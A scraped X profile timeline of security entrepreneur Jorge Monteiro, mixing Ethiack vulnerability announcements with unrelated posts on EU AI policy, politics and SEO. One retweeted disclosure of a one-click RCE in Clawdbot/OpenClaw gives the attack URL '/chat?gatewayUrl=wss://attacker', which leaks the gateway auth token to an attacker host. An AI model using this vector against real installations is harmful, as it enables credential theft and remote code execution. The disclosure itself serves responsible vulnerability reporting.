Jorge Monteiro

70 posts

Jorge Monteiro banner
Jorge Monteiro

Jorge Monteiro

@jbmonteiro

entrepreneur, dad, explorer | co-founder @ethiack

Portugal Katılım Ağustos 2018
493 Takip Edilen122 Takipçiler
Jorge Monteiro
Jorge Monteiro@jbmonteiro·
@steipete No, vulns happen always. But vendors shall be responsible for testing their products. In this case we tested it for you. You’re welcome
English
0
0
0
26
Peter Steinberger 🦞
Peter Steinberger 🦞@steipete·
@jbmonteiro Look at the software industry, you think vulnerabilities only happen in the old ways? If you read the security docs and configure gateway how it’s designed (in your secure network only) this issue doesn’t apply.
English
1
1
3
637
Jorge Monteiro retweetledi
André Baptista
André Baptista@0xacb·
🚨We found RCE in Clawdbot 🚨 If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.  The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian". Here's how it went down 👇 We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load. Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏 On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token! Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇 ethiack.com/news/blog/one-…
English
24
158
672
121K
Jorge Monteiro retweetledi
Ethiack
Ethiack@ethiack·
Hackian just uncovered a high-severity vulnerability and achieved 1-click RCE in @openclaw (previously Clawdbot), fully autonomously, in under 2 hours. We explain how and show you Hackian’s thought process in our latest blog: ethiack.com/news/blog/one-…
Ethiack tweet media
English
0
9
23
3.5K
Jorge Monteiro retweetledi
Ethiack
Ethiack@ethiack·
We’ve just analyzed 50,000 assets from European Retail companies. And there are some concerning data points: 16% of connections use invalid or outdated SSL certificates. 17% of web servers expose their version number, easing criminal exploitation. Medium-sized retailers, in the 1000-5000 employee range, have the worst posture. Our new “State of Digital Exposure for European Retail” report uses this data, industry trends, and insights from experts at Nemlig, Carrefour, and others to show what’s to come in Retail. Read the report and find out what you have to do to stop being a statistic. Fully accessible here: ethiack.com/news/blog/digi…
Ethiack tweet media
English
0
2
5
835
Jorge Monteiro retweetledi
Ethiack
Ethiack@ethiack·
In the AI era, traditional security scanners are obsolete.  Ethiack CEO and Founder Jorge Monteiro discusses the transition to autonomous technology that mimics the behavior of real hackers 👇
English
1
1
4
218
Jorge Monteiro retweetledi
Ethiack
Ethiack@ethiack·
We’re now detecting the new MongoDB's Memory Exposure Vulnerability. This CVSS 8.7 vulnerability lets unauthenticated attackers read uninitialized heap memory from MongoDB servers, without needing credentials. Affected versions span MongoDB 3.6 through 8.2. If you're running any of these versions, your database is exposed. We’re already detecting this vulnerability across your attack surface, so if you’re unsure you’re exposed, check your dashboard. More info on the CVE here: ethiack.com/news/product/m…
Ethiack tweet media
English
1
3
7
950
@levelsio
@levelsio@levelsio·
@philipcurryo Give me one example where AI agents actually can do something useful except AI spam replies and AI spam emails for outbound sales?
English
183
12
968
219.1K
Jorge Monteiro retweetledi
Ethiack
Ethiack@ethiack·
This week two massive CVEs affecting React and Next.js were released, with massive repercussions. CVE-2025-55182 and CVE-2025-66478 are critical unauthenticated RCE vulnerabilities affecting even default configurations. After the CVE was announced, we've begun working on a testing module, and we've started testing customers today. If you use React or Next.js, please upgrade to an hardened release immediately.
Ethiack tweet mediaEthiack tweet media
English
1
8
19
4K
Jorge Monteiro
Jorge Monteiro@jbmonteiro·
@levelsio If you are selected with that application, I quit Europe for good
English
0
0
0
24
@levelsio
@levelsio@levelsio·
🇪🇺 As a European citizen and AI founder, I can apparently use these "AI Factories", so I just signed up to use them! Every "supercomputer" has an [ ACCESS NOW ] button which made me very excited I expected to sign up, maybe pay a discounted H100 rate (funded by EU, that'd be nice?) and get a Jypyter notebook, or some SSH login so I can access my GPU like I'd do on @lambdaapi or @awscloud or @Hetzner_Online But I celebrated to early, I signed up, confirmed my email, then ended up in a "Supercomputer Access Calls" page, where I had to select from a tedious list of "Call For Proposals" to get access to a GPU So I could NOT just access a H100 GPU, I have to make sure my project (in this case my business) fits a specific proposal, ok fair This process was already tedious enough but then when I tried to actually go through with it, it started asking me if I had "Respect for Human Agency?", I do I think, and if I was mindful of "Individual, and Social and Environmental Well-Being?", well I am, right guys??? Right??? The questions didn't stop, just endless pages of this Look I get what they're doing, they pivoted the classic university "I need to rent a giant computer for my research" to an EU wide thing and then present it as the "European AI plan" But this isn't really how AI works in production? As a founder in AI, if I wanna do stuff I'd rent a whole bunch H100 GPUs again at @lambdaapi or @awscloud or @Hetzner_Online and SSH into a box Or if I want it more simple I run AI models on @FAL, @wavespeed or @replicate which is just an API call or web front end I can click stuff and run a model The EU has the right intentions here but it's just the wrong execution, this thing will 100% go nowhere, and I'm a born optimist, I want to believe, I'm also a proud European, and I'm in AI a bit and not a complete idiot. There's just better ways to do this If you really want to have the GPU servers in Europe (which arguably isn't that important), then let me rent a GPU box with SSH access at @Hetzner_Online or @OVHcloud that's hosted in Europe and subsidize that for European citizens and European businesses. I don't even believe in that, but at least that'd make it accessible for Europeans. Now it really isn't? What's REALLY much more important though if you want to be a part of the AI race and I've posted for years here with @euaccofficial is to make Europe a really extremely attractive place to start and run an AI business. Remove regulatory obstructions and give tax discounts for startups. Let them build a business first that can compete worldwide and once they make enough money (let's say $100M/y), then slowly start adding regulation. Because right now the regulation only benefits the European incumbents, the dinosaur companies, while making it very difficult for European citizens to start new AI companies here. Which is why we literally have none left. Anyway, I applied to get my GPU, let's see if I get it!
@levelsio@levelsio

What in the F is an AI factory? I had to investigate what the unelected @EU_Commission is talking about today So according to them, it's some data centers (which they call supercomputers) in 6 different EU countries I checked out the most powerful one: Karolina, a Czech data center, it mostly has CPUs though (see pic) not GPUs, so mostly useless for AI The GPUs it does have are 72x 8x NVIDIA A100 GPU, so 576x A100, or equivalent of 240x H100s (H100 is about 2.4x the compute power of A100) So let's compare that: @xAI has 200,000x H100 GPUs So the xAI data center has 800x more compute than the Czech one If we combine xAI, Meta, AWS, etc. it's about 750,000 H100s If we assume the other 5 data centers in the EU are equivalent to the Czech one (which is massive stretch because most of the others seem AI consultacny services, they don't even HAVE chips!), the EU's new "AI factories" have a total of 1,440x H100 GPUs, let's round up to 1,500 to be nice So the EU is trying to compete with 750,000 GPUs with their own 1,500 GPUs, so 500x less?? Correct me if I'm wrong but it's just seems very low impact and another ridiculous idea and burning of EU tax payers money that will end up in local cronies and bureaucrats and will do NOTHING to improve the AI business climate for Europe The best way to improve it is to deregulate, make it super easy and low tax (especially when starting out) to start AI companies in Europe

English
391
461
4.7K
1.5M
Jorge Monteiro retweetledi
Ethiack
Ethiack@ethiack·
You’re about to see the world’s first show & tell from a hackbot. Enjoy!
English
10
37
208
481.1K
Jorge Monteiro retweetledi
Paul Graham
Paul Graham@paulg·
Elon and Steve Jobs are both famous for pushing people to simplify their designs. I don't think this is a coincidence. Large organizations naturally generate complexity, but if you have a CEO who hates it, this tendency is kept in check.
Paul Graham tweet media
English
162
323
4.9K
333.1K
@levelsio
@levelsio@levelsio·
Immigrants in Portugal are just the scapegoat for a dysfunctional government and corrupt system that doesn't build housing, makes it impossible for Portuguese to start or run businesses This means no jobs created so no job opportunities for them, and no houses built so no places to live for them. Which results in most young Portuguese leaving the country at age 18-25 Before the scapegoat was the digital nomads, and before that the Brazilians. Now it's the South Asian immigrants Portuguese love to blame foreigners for the problems their own government has created Every problem in Portugal is an extreme version of Europe's problems as a whole btw
@levelsio tweet media
Alex Doda 🇦🇶@alexdoda

@levelsio Is Lisbon flooded with islam / asylum seekers rn or kinda normal & it’s just social media algos? I live south of bridge & haven’t been there in a while (although it’s 20 mins away lol). My girl showed some reels - looked just like London - but I couldn’t find anything.

English
193
180
2.3K
755.5K
Jorge Monteiro retweetledi
Mario Nawfal
Mario Nawfal@MarioNawfal·
🚨🇦🇷MILEI’S “CRAZY” PLAN WORKED—ARGENTINA’S PAYCHECKS JUST HIT A 6-YEAR HIGH Private sector wages in Argentina just spiked to their best level since 2018—real wages hit 107 in Feb 2025, up from a sad 91 in late 2023. What changed? Oh, just Milei dropping economic reforms like they were hot. People called it “shock therapy.” Turns out, it was more “money therapy.” Critics yelled, “He’ll crash the economy!” Workers are now yelling, “Payday!” Love him or hate him, Milei’s free-market rollercoaster is actually handing folks fatter checks—for the first time in forever. Source: Observatory of Employment and Business Dynamics, @JMilei, @ArgMilei
Mario Nawfal tweet media
Mario Nawfal@MarioNawfal

🚨🇦🇷MILEI PULLS OFF A MONEY MAGIC TRICK—SURPLUS AFTER TAX CUTS Argentina just posted a $440M surplus in March—yes, even after slashing taxes. That includes a solid $825M primary surplus, or 0.1% of GDP. Economy chief Luis Caputo says the whole first quarter ended in the green, with a 0.2% surplus. Not too shabby for a country famous for economic chaos. Milei’s crew cut export taxes and ditched the controversial “Impuesto PAIS,” but somehow didn’t blow the budget. Next year’s goal? Even bigger: 1.6% primary surplus. Turns out Milei’s weapon of choice is... spending less. And right now? It’s working. Source: @LuisCaputoAR, @JMilei, @argmilei

English
511
2.6K
12.3K
2.7M
Jorge Monteiro
Jorge Monteiro@jbmonteiro·
A bola nao tem de ir ao povo, o povo vem à bola
Portimão, Portugal 🇵🇹 Português
0
0
0
39
John Rush
John Rush@johnrushx·
SEO is simple but not easy. 4 months ago, I quietly launched llmmodels.org. It took a while but started growing and really took off a week ago. Here is my process: 1. Domain name - matches a keyword with high traffic and low competition (only .com/.org/.ai). 2. Website runs on SEO-optimized CMS (I run them on Unicorn Platform). 3. Domain Rating must be > 10. Earn 100+ backlinks. (I used ListingBott). 4. Scrape or manually curate the directory items. This one is really important. The quality of items must be high. 5. Launch on PH, IH, HN, DevTo, Reddit, X, LD (for clicks and for backlinks for SEO). 6. Run SeoBotAI for blog articles. Wait for a month. Find top articles and manually improve them to make them even better. 7. Run an indexing tool to get pages indexed by google faster ( I used my own IndexRusher . com) 8. See top keywords driving traffic to each page and place those keywords into meta title/description/h1. Do it for top 10 pages every month. 9. Keep updating the database with fresh items. 10. Make more directories to interlink them all and grow even better with SEO. -- I'm working on a "Directory Incubator" program launching in early Sept. - 4 weeks - paid - best directory will get my sponsorship for a year I'll pick about 50 people for the first batch—maybe less. Reply to this post and I'll DM you application form once it's live.
John Rush tweet media
English
76
14
476
80.4K
John Rush
John Rush@johnrushx·
I'm launching a Directory BuilderVerse. - the builder & templates for jobboards, lists, launchpads, courses, info sites, help desks, blogs, programmatic SEO. Every SaaS maker should have few directories to channel traffic, passive income & backlinks. But here is the coolest part: 1. I'll also launch an incubator, "Directory as a side project," thing to help others launch directories and grow them using SEO, viral marketing, collabs, etc. (90-day batches). 2. The best directory of the batch will win prizes(money, fame and coupons for my tools) I'm working out the details by running a small batch already and learning by doing. 3. The program will be paid(small sum, to make sure I filter out those who aren't serious about the thing). >>> Join the waitlist by replying.
John Rush tweet media
English
108
4
147
20.9K
Jorge Monteiro
Jorge Monteiro@jbmonteiro·
If you are in SaaS in 2024, and you are not investing in cybersecurity you are irresponsible Doing technology without testing is careless. You are putting yourself and your customers in danger. Change my mind.
English
0
0
1
45